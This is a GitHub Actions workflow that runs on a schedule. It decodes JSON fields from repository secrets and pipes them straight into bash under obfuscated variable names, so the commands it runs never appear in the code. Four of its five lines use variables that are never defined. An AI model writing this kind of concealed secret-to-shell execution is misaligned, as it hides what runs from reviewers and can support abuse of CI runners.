name: haofengshengna
on:
  workflow_dispatch:
  schedule:
    - cron: '10 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: haofengshengna
        env:
          wrd768: ${{ secrets.wrd768 }}
        run: |
          echo $wrd768 | jq -r .zcgpz05 | /bin/bash
          echo $q122 | jq -r .f089 | /bin/bash
          echo $wm8898 | jq -r .vpx54914 | /bin/bash
          echo $rp5292 | jq -r .h49 | /bin/bash
          echo $b82 | jq -r .afqt39 | /bin/bash

